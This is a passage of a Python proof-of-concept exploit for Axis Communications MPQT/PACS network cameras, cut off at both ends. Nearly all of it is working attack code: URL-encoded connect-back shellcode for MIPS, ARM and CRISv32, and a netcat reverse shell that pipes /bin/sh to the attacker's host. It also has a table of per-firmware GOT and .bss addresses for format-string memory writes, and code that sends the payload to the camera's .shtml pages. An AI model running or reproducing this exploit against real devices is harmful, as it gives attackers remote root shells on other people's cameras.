"%f8%ff%a5%23" #addi a1,sp,-8 + "%ec%ff%bd%27" #addiu sp,sp,-20 + "%ff%ff%06%28" #slti a2,zero,-1 + "%ab%0f%02%24" #li v0,4011 (execve) + "%4c%f7%f7%03" #syscall 0xdfdfd + ], '') + + # Working netcat shell + # - $PATH will locate 'mkfifo', 'nc' and 'rm' + # - LHOST / LPORT will be changed on the fly later in the code + # - 1) make FIFO, 2) netcat back to attacker with STDIN to /bin/sh, and PIPE STDOUT back to the remote via FIFO, 3) remove FIFO when exiting + # - $IFS = [By default, and we need or as separator] + # $ echo -n "$IFS" | hexdump -C + # 00000000 20 09 0a + # - $PS1 = $ [By default, and we need something to "comment" out our trailing FMS code from /bin/sh -c] + # + # '2>/tmp/s' (STDERR > 
FIFO) Don't work with $IFS as separator + # + # Working with Apache and Boa +# NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s\"$IFS\"2>/tmp/s;rm$IFS/tmp/s;$PS1" + NCSH = "mkfifo$IFS/tmp/s;nc$IFS-w$IFS\"5\"$IFS\"LHOST\"$IFS\"LPORT\"$IFS0/tmp/s;rm$IFS/tmp/s;$PS1" + + ARMel = string.join([ + # original: http://shell-storm.org/shellcode/files/shellcode-754.php + # 32-bit instructions, enter thumb mode + "%01%10%8f%e2" # add r1, pc, #1 + "%11%ff%2f%e1" # bx r1 + + # 16-bit thumb instructions follow + # + # socket(2, 1, 0) + "%02%20" #mov r0, #2 + "%01%21" #mov r1, #1 + "%92%1a" #sub r2, r2, r2 + "%0f%02" #lsl r7, r1, #8 + "%19%37" #add r7, r7, #25 + "%01%df" #svc 1 + # + # connect(r0, &addr, 16) + "%06%1c" #mov r6, r0 + "%08%a1" #add r1, pc, #32 + "%10%22" #mov r2, #16 + "%02%37" #add r7, #2 + "%01%df" #svc 1 + # + # dup2(r0, 0/1/2) + "%3f%27" #mov r7, #63 + "%02%21" #mov r1, #2 + # + #lb: + "%30%1c" #mov r0, r6 + "%01%df" #svc 1 + "%01%39" #sub r1, #1 + "%fb%d5" #bpl lb + # + # execve("/bin/sh", ["/bin/sh", 0], 0) + "%05%a0" #add r0, pc, #20 + "%92%1a" #sub r2, r2, r2 + "%05%b4" #push {r0, r2} + "%69%46" #mov r1, sp + "%0b%27" #mov r7, #11 + "%01%df" #svc 1 + # + "%c0%46" # .align 2 (NOP) + "%02%00" # .short 0x2 (struct sockaddr) + "PP1PP0" # .short 0x3412 (port: 0x1234) + "IP1IP2IP3IP4" #.byte 192,168,57,1 (ip: 192.168.57.1) + # .ascii "/bin/sh\0\0" + "%2f%62%69%6e" # /bin + "%2f%73%68%00%00" # /sh\x00\x00 + "%00%00%00%00" + "%c0%46" + ], '') + + + # Connect-back shell for Axis CRISv32 + # Written by mcw noemail eu 2016 + # + CRISv32 = string.join([ + #close(0) + "%7a%86" # clear.d r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(1) + "%41%a2" # moveq 1,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + #close(2) + "%42%a2" # moveq 2,r10 + "%5f%9c%06%00" # movu.w 0x6,r9 + "%3d%e9" # break 13 + # + "%10%e1" # addoq 16,sp,acr + "%42%92" # moveq 2,r9 + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + 
"%02%f2" # addq 2,acr + #PORT + "%5f%9ePP1PP0" # move.w 0xPP1PP0,r9 # + "%df%9b" # move.w r9,[acr] + "%10%e1" # addoq 16,sp,acr + "%6f%96" # move.d acr,r9 + "%04%92" # addq 4,r9 + #IP + "%6f%feIP1IP2IP3IP4" # move.d IP4IP3IP2IP1,acr + "%e9%fb" # move.d acr,[r9] + # + #socket() + "%42%a2" # moveq 2,r10 + "%41%b2" # moveq 1,r11 + "%7c%86" # clear.d r12 + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%41%a2" # moveq 1,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # + "%6a%96" # move.d $r10,$r9 + "%0c%e1" # addoq 12,$sp,$acr + "%ef%9b" # move.d $r9,[$acr] + "%0c%e1" # addoq 12,$sp,$acr + "%6e%96" # move.d $sp,$r9 + "%10%92" # addq 16,$r9 + "%6f%aa" # move.d [$acr],$r10 + "%69%b6" # move.d $r9,$r11 + "%50%c2" # moveq 16,$r12 + # + # connect() + "%6e%96" # move.d $sp,$r9 + "%e9%af" # move.d $r10,[$r9+] + "%e9%bf" # move.d $r11,[$r9+] + "%e9%cf" # move.d $r12,[$r9+] + "%43%a2" # moveq 3,$r10 + "%6e%b6" # move.d $sp,$r11 + "%5f%9c%66%00" # movu.w 0x66,$r9 + "%3d%e9" # break 13 + # dup(0) already in socket + #dup(1) + "%6f%aa" # move.d [$acr],$r10 + "%41%b2" # moveq 1,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #dup(2) + "%6f%aa" # move.d [$acr],$r10 + "%42%b2" # moveq 2,$r11 + "%5f%9c%3f%00" # movu.w 0x3f,$r9 + "%3d%e9" # break 13 + # + #execve("/bin/sh",NULL,NULL) + "%90%e2" # subq 16,$sp + "%6e%96" # move.d $sp,$r9 + "%6e%a6" # move.d $sp,$10 + "%6f%0e%2f%2f%62%69" # move.d 69622f2f,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%6f%0e%6e%2f%73%68" # move.d 68732f6e,$r0 + "%e9%0b" # move.d $r0,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%04%92" # addq 4,$r9 + "%e9%ab" # move.d $r10,[$r9] + "%04%92" # addq 4,$r9 + "%79%8a" # clear.d [$r9] + "%10%e2" # addq 16,$sp + "%6e%f6" # move.d $sp,$acr + "%6e%96" # move.d $sp,$r9 + "%6e%b6" # move.d 
$sp,$r11 + "%7c%86" # clear.d $r12 + "%4b%92" # moveq 11,$r9 + "%3d%e9" # break 13 + ], '') + + + if self.target == 'MIPSel': + return MIPSel + elif self.target == 'ARMel': + return ARMel + elif self.target == 'CRISv32': + return CRISv32 + elif self.target == 'NCSH1': + return NCSH + elif self.target == 'NCSH2': + return NCSH + else: + print "[!] Unknown shellcode! (%s)" % str(self.target) + sys.exit(1) + + +class FMSdb: + + def __init__(self,targetIP,verbose): + self.targetIP = targetIP + self.verbose = verbose + + def FMSkey(self,target): + self.target = target + + target_db = { + +#----------------------------------------------------------------------- +# All pointing from free() GOT to shellcode on .bss (Except ARM with NCSH) +#----------------------------------------------------------------------- + +# +# Using POP format string, AKA 'Old Style' +# + # MPQT + 'MIPS-5.85.x': [ + 0x41f370, # Adjust to GOT free() address + 0x420900, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.40.3': [ + 0x41e41c, # Adjust to GOT free() address + 0x4208cc, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.4x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x42097c, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'ax', # Aligns injected code + 450, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.5x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.55x': [ + 0x41d11c, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 11, # 1st POP's + 9, # 2nd 
POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.6x': [ + 0x41d048, # Adjust to GOT free() address + 0x41f728, # .bss shellcode address + 5, # 1st POP's + 15, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + + ], + + # MPQT + 'MIPS-5.7x': [ + 0x41d04c, # Adjust to GOT free() address + 0x41f718, # .bss shellcode address + 2, # 1st POP's + 14, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.75x': [ + 0x41c498, # Adjust to GOT free() address + 0x41daf0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # Shared with MPQT and PACS + 'MIPS-5.8x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e740, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-5.9x': [ + 0x41d0c0, # Adjust to GOT free() address + 0x41e750, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.1x': [ + 0x41c480, # Adjust to GOT free() address + 0x41dac0, # .bss shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.2x': [ + 0x41e578, # Adjust to GOT free() address + 0x41fae0, # .bss shellcode address + 2, # 1st POP's + 2, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # MPQT + 'MIPS-6.20x': [ + 0x41d0c4, # Adjust to GOT free() address + 0x41e700, # .bss 
shellcode address + 3, # 1st POP's + 13, # 2nd POP's + 'axi', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.3x': [ + 0x41e4cc, # Adjust to GOT free() address + 0x420a78, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + + # PACS + 'MIPS-1.1x': [ + 0x41e268, # Adjust to GOT free() address + 0x420818, # .bss shellcode address + 7, # 1st POP's + 11, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'MIPSel' # Shellcode type + ], + +# +# Tested with execstack to set executable stack flag bit on bin's and lib's +# +# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working. +# + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.50x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1e7c8, # .bss shellcode address + 93, # 1st POP's + 1, # 2nd POP's + 'axis', # Aligns injected code + 700, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + + # ARMel with bin/libs executable stack flag set with 'execstack' + # MPQT + 'ARM-5.55x': [ # + 0x1c15c, # Adjust to GOT free() address + 0x1e834, # .bss shellcode address + 59, # 1st POP's + 80, # 2nd POP's + 'axis', # Aligns injected code + 800, # How big buffer before shellcode + 'ARMel' # Shellcode type (ARMel) + ], + +# +# Using direct parameter access format string, AKA 'New Style' +# + # MPQT + 'ARM-NCSH-5.20x': [ # AXIS P1311 5.20 (id=root) + 0x1c1b4, # Adjust to GOT free() address + 0x10178, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.2x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x1013c, # Adjust to "/bin/sh -c; pipe(); vfork(); 
execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.4x': [ # + 0x1c1b4, # Adjust to GOT free() address + 0x101fc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 61, # 1st POP's + 115, # 2nd POP's + 143, # 3rd POP's + 118, # 4th POP's + 'NCSH2' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'ARM-NCSH-5.5x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfdcc, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.6x': [ # + 0x1c15c, # Adjust to GOT free() address + 0xfcec, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 97, # 1st POP's + 0, # 2nd POP's + 41, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-5.7x': [ # + 0x1c1c0, # Adjust to GOT free() address + 0xf800, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 132, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 0, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # Will go in endless loop after exit of nc shell... 
DoS sux + # MPQT + 'ARM-NCSH-5.8x': [ # + 0x1b39c, # Adjust to GOT free() address + 0xf8c0, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 98, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], + + # MPQT + 'ARM-NCSH-6.1x': [ # + 0x1d2a4, # Adjust to GOT free() address +# 0xecc4, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 0xecc8, # Adjust to "/bin/sh -c; pipe(); vfork(); execve()" + 106, # 1st POP's + 0, # 2nd POP's + 34, # 3rd POP's + 1, # 4th POP's + 'NCSH1' # Shellcode type (Netcat Shell) + ], +# +# Using POP format string, AKA 'Old Style' +# + + # MPQT + 'CRISv32-5.5x': [ # + 0x8d148, # Adjust to GOT free() address + 0x8f5a8, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.4x': [ # + 0x8d0e0, # Adjust to GOT free() address + 0x8f542, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.2x': [ # + 0x8d0b4, # Adjust to GOT free() address + 0x8f4d6, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ], + + # MPQT + 'CRISv32-5.20.0': [ # + 0x8d0e4, # Adjust to GOT free() address + 0x8f546, # .bss shellcode address + 4, # 1st POP's + 13, # 2nd POP's + 'axis', # Aligns injected code + 470, # How big buffer before shellcode + 'CRISv32' # Shellcode type (Crisv32) + ] + + + } + + if self.target == 0: + return target_db + + if not self.target in target_db: + print "[!] Unknown FMS key: %s!" 
% self.target + sys.exit(1) + + if self.verbose: + print "[Verbose] Number of availible FMS keys:",len(target_db) + + return target_db + + +# +# Validate correctness of HOST, IP and PORT +# +class Validate: + + def __init__(self,verbose): + self.verbose = verbose + + # Check if IP is valid + def CheckIP(self,IP): + self.IP = IP + + ip = self.IP.split('.') + if len(ip) != 4: + return False + for tmp in ip: + if not tmp.isdigit(): + return False + i = int(tmp) + if i < 0 or i > 255: + return False + return True + + # Check if PORT is valid + def Port(self,PORT): + self.PORT = PORT + + if int(self.PORT) < 1 or int(self.PORT) > 65535: + return False + else: + return True + + # Check if HOST is valid + def Host(self,HOST): + self.HOST = HOST + + try: + # Check valid IP + socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP + # Or we check again if it is correct typed IP + if self.CheckIP(self.HOST): + return self.HOST + else: + return False + except socket.error as e: + # Else check valid DNS name, and use the IP address + try: + self.HOST = socket.gethostbyname(self.HOST) + return self.HOST + except socket.error as e: + return False + + + +if __name__ == '__main__': + +# +# Help, info and pre-defined values +# + INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis ]' + HTTP = "http" + HTTPS = "https" + proto = HTTP + verbose = False + noexploit = False + lhost = '192.168.0.1' # Default Local HOST + lport = '31337' # Default Local PORT + rhost = '192.168.0.90' # Default Remote HOST + rport = '80' # Default Remote PORT + # Not needed for the SSI exploit, here for possible future usage. 
+# creds = 'root:pass' + creds = False + +# +# Try to parse all arguments +# + try: + arg_parser = argparse.ArgumentParser( +# prog=sys.argv[0], + prog='axis-ssid-PoC.py', + description=('[*]' + INFO + '\n')) + arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']') + arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']') + arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']') + arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']') + arg_parser.add_argument('--fms', required=False, help='Manual FMS key') + if creds: + arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']') + arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]') + arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]') + arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]') + arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose') + args = arg_parser.parse_args() + except Exception as e: + print INFO,"\nError: %s\n" % str(e) + sys.exit(1) + + # We want at least one argument, so print out help + if len(sys.argv) == 1: + arg_parser.parse_args(['-h']) + + print "\n[*]",INFO + + if args.verbose: + verbose = args.verbose + + # Print out info from dictionary + if args.dict: + target = FMSdb(rhost,verbose).FMSkey(0) + print "[db] Number of FMS keys:",len(target) + + # Print out detailed info from dictionary + if verbose: + + print "[db] 
Target details of FMS Keys availible for manual xploiting" + print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]" + + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] == 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6] + + print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]" + for tmp in range(0,len(target)): + Key = sorted(target.keys())[tmp] + temp = re.split('[-]',Key)[0:10] + + if temp[1] != 'NCSH': + print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6] + + print "\n" + else: + print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:" + Key = "" + for tmp in range(0,len(target)): + Key += sorted(target.keys())[tmp] + Key += ', ' + print '\n',Key,'\n' + sys.exit(0) + +# +# Check validity, update if needed, of provided options +# + if args.https: + proto = HTTPS + if not args.rport: + rport = '443' + + if creds and args.auth: + creds = args.auth + + if args.noexploit: + noexploit = args.noexploit + + if args.rport: + rport = args.rport + + if args.rhost: + rhost = args.rhost + + if args.lport: + lport = args.lport + + if args.lhost: + lhost = args.lhost + + # Check if LPORT is valid + if not Validate(verbose).Port(lport): + print "[!] Invalid LPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if RPORT is valid + if not Validate(verbose).Port(rport): + print "[!] Invalid RPORT - Choose between 1 and 65535" + sys.exit(1) + + # Check if LHOST is valid IP or FQDN, get IP back + lhost = Validate(verbose).Host(lhost) + if not lhost: + print "[!] 
Invalid LHOST" + sys.exit(1) + + # Check if RHOST is valid IP or FQDN, get IP back + rhost = Validate(verbose).Host(rhost) + if not rhost: + print "[!] Invalid RHOST" + sys.exit(1) + + +# +# Validation done, start print out stuff to the user +# + if noexploit: + print "[i] Test mode selected, no exploiting..." + if args.https: + print "[i] HTTPS / SSL Mode Selected" + print "[i] Remote target IP:",rhost + print "[i] Remote target PORT:",rport + print "[i] Connect back IP:",lhost + print "[i] Connect back PORT:",lport + + rhost = rhost + ':' + rport + +# +# FMS key is required into this PoC +# + if not args.fms: + print "[!] FMS key is required!" + sys.exit(1) + else: + Key = args.fms + print "[i] Trying with FMS key:",Key + +# +# Prepare exploiting +# + # Look up the FMS key in dictionary and return pointer for FMS details to use + target = FMSdb(rhost,verbose).FMSkey(Key) + + if target[Key][6] == 'NCSH1': + NCSH1 = target[Key][6] + NCSH2 = "" + elif target[Key][6] == 'NCSH2': + NCSH2 = target[Key][6] + NCSH1 = "" + else: + NCSH1 = "" + NCSH2 = "" + + if Key == 'ARM-NCSH-5.8x': + print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n" + sys.exit(0) + + print "[i] Preparing shellcode:",str(target[Key][6]) + + # We don't use url encoded shellcode with Netcat shell + # This is for MIPS/CRISv32 and ARM shellcode + if not NCSH1 and not NCSH2: + FMSdata = target[Key][4] # This entry aligns the injected shellcode + + # Building up the url encoded shellcode for sending to the target, + # and replacing LHOST / LPORT in shellcode to choosen values + + # part of first 500 decoded bytes will be overwritten during stage #2, and since + # there is different 'tailing' on the request internally, keep it little more than needed, to be safe. + # Let it be 0x00, just for fun. 
+ FMSdata += '%00' * target[Key][5] + + # Connect back IP to url encoded + ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.'))) + ip_hex = ip_hex.split() + IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3]; + + # Let's break apart the hex code of LPORT into two bytes + port_hex = hex(int(lport))[2:] + port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2) + port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2)) + port_hex = port_hex.split() + + if (target[Key][6]) == 'MIPSel': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%ff" + PP0 = '%{:02x}'.format((int(port_hex[0],16)-1)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format((int(port_hex[0],16)-1)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32 + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + elif (target[Key][6]) == 'CRISv32': + # Connect back PORT + if len(port_hex) == 1: + PP1 = "%00" + PP0 = '%{:02x}'.format(int(port_hex[0],16)) + elif len(port_hex) == 2: + # Little Endian + PP1 = '%{:02x}'.format(int(port_hex[0],16)) + PP0 = '%{:02x}'.format(int(port_hex[1],16)) + else: + print "[!] Unknown shellcode! 
(%s)" % str(target[Key][6]) + sys.exit(1) + + # Replace LHOST / LPORT in URL encoded shellcode + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("IP1",IP1) + shell = shell.replace("IP2",IP2) + shell = shell.replace("IP3",IP3) + shell = shell.replace("IP4",IP4) + shell = shell.replace("PP0",PP0) + shell = shell.replace("PP1",PP1) + FMSdata += shell + +# +# Calculate the FMS values to be used +# + # Get pre-defined values + ALREADY_WRITTEN = 40 # Already 'written' in the daemon before our FMS +# POP_SIZE = 8 + POP_SIZE = 1 + + GOThex = target[Key][0] + BSShex = target[Key][1] + GOTint = int(GOThex) + + # 'One-Write-Where-And-What' + if not NCSH1 and not NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE) + + BSSint = int(BSShex) + BSSint = (BSSint - GOTint - ALREADY_WRITTEN) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint + + # 'Two-Write-Where-And-What' using "New Style" + elif NCSH2: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + + # Calculate SecondWhat value, so it always is 0x20300 + SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE) + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + FirstWhat = FirstWhat - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated 
FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + + # 'Two-Write-Where-And-What' using "Old Style" + elif NCSH1: + + POP1 = target[Key][2] + POP2 = target[Key][3] + POP3 = target[Key][4] + POP4 = target[Key][5] + POP2_SIZE = 2 + + # FirstWhat writes with 4 bytes (Y) (0x0002YYYY) + # SecondWhat writes with 1 byte (Z) (0x00ZZYYYY) + if BSShex > 0x10000: + MSB = 1 + else: + MSB = 0 + + # We need to count higher than provided address for the jump + BaseAddr = 0x10000 + BSShex + + # Calculate for creating the FMS code + ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE) + + GOTint = (GOTint - ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE) + + # Calculate FirstWhat value + FirstWhat = BaseAddr - (ALREADY_WRITTEN) + + ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE) + + # Calculate SecondWhat value, so it always is 0x203[00] or [01] + SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB + + shell = shellcode_db(rhost,verbose).sc(target[Key][6]) + shell = shell.replace("LHOST",lhost) + shell = shell.replace("LPORT",lport) + + GOTint = GOTint - len(shell) + +# if verbose: +# print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat + + else: + print "[!] 
NCSH missing, exiting" + sys.exit(1) +# +# Let's start the exploiting procedure +# + +# +# Stage one +# + if NCSH1 or NCSH2: + + # "New Style" needs to make the exploit in two stages + if NCSH2: + FMScode = do_FMS(rhost,verbose) + # Writing 'FirstWhere' and 'SecondWhere' + # 1st request + FMScode.AddADDR(GOTint) # Run up to free() GOT address + # + # 1st and 2nd "Write-Where" + FMScode.AddDirectParameterN(POP1) # Write 1st Where + FMScode.Add("XX") # Jump up two bytes for next address + FMScode.AddDirectParameterN(POP2) # Write 2nd Where + FMSdata = FMScode.FMSbuild() + else: + FMSdata = "" + + print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + else: + print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata)) + + # Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM + # Actually, any valid and public readable .shtml file will work... + # (One of the two below seems always to be usable) + # + # For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two + # For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url + # + try: + target_url = "/httpDisabled.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/httpDisabled.shtml?&http_user=" + + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell + else: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata) + except urllib2.HTTPError as e: + if e.code == 404: + print "[<] Error",e.code,e.reason + target_url = "/view/viewer_index.shtml?user_agent=" + if noexploit: + target_url2 = target_url + else: + target_url2 = "/view/viewer_index.shtml?&http_user=" + print "[>] Using alternative target shtml" + if NCSH2: + html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) 
